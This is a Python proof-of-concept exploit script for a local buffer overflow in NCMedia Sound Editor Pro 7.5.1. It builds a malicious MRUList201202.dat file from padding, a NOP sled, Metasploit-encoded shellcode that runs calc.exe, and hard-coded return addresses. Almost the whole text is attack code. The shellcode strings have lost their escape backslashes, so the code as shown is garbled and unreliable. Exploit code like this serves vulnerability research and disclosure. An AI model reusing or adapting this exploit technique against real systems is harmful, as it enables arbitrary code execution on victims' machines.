#!/usr/bin/python
 
# Exploit Title: NCMedia Sound Editor Pro v7.5.1 MRUList201202.dat File Handling Local Buffer Overflow
# Version:       7.5.1
# Date:          2012-08-07
# Author:        Julien Ahrens
# Website:       http://www.inshell.net
# Software Link: http://www.soundeditorpro.com/
# Tested on:     Windows XP SP3 Professional German
# Howto:         Copy MRUList201202.dat to %appdata%Sound Editor Pro --> Launch app --> Click on "File" Menu

from struct import pack

file="MRUList201202.dat"

# windows/exec CMD=calc.exe 
# Encoder: x86/shikata_ga_nai
# powered by Metasploit 
# msfpayload windows/exec CMD=calc.exe R | msfencode -b 'x00x0dx0a'

shellcode = ("xd9xc7xbax2dxddx15x6dxd9x74x24xf4x58x29xc9" +
"xb1x33x31x50x17x03x50x17x83xedxd9xf7x98x11" +
"x09x7ex62xe9xcaxe1xeax0cxfbx33x88x45xaex83" +
"xdax0bx43x6fx8exbfxd0x1dx07xb0x51xabx71xff" +
"x62x1dxbex53xa0x3fx42xa9xf5x9fx7bx62x08xe1" +
"xbcx9exe3xb3x15xd5x56x24x11xabx6ax45xf5xa0" +
"xd3x3dx70x76xa7xf7x7bxa6x18x83x34x5ex12xcb" +
"xe4x5fxf7x0fxd8x16x7cxfbxaaxa9x54x35x52x98" +
"x98x9ax6dx15x15xe2xaax91xc6x91xc0xe2x7bxa2" +
"x12x99xa7x27x87x39x23x9fx63xb8xe0x46xe7xb6" +
"x4dx0cxafxdax50xc1xdbxe6xd9xe4x0bx6fx99xc2" +
"x8fx34x79x6ax89x90x2cx93xc9x7cx90x31x81x6e" +
"xc5x40xc8xe4x18xc0x76x41x1axdax78xe1x73xeb" +
"xf3x6ex03xf4xd1xcbxfbxbex78x7dx94x66xe9x3c" +
"xf9x98xc7x02x04x1bxe2xfaxf3x03x87xffxb8x83" +
"x7bx8dxd1x61x7cx22xd1xa3x1fxa5x41x2fxcex40" +
"xe2xcax0e")

junk1="x41" * 12
nopsled="x90" * 20
junk2="x42" * (4108 - len(shellcode) - len(nopsled))
eip=pack('<L',0x004d893e) # ADD ESP,404 # POP EDI # POP ESI # RETN from SoundEditorPro.exe
esp=pack('<L',0x7e8236d9) # CALL ESP from shell32.dll

poc=junk1 + esp + nopsled + shellcode + junk2 + eip 

try:
    print "[*] Creating exploit file...n"
    writeFile = open (file, "w")
    writeFile.write( poc )
    writeFile.close()
    print "[*] File successfully created!"
except:
    print "[!] Error while creating file!"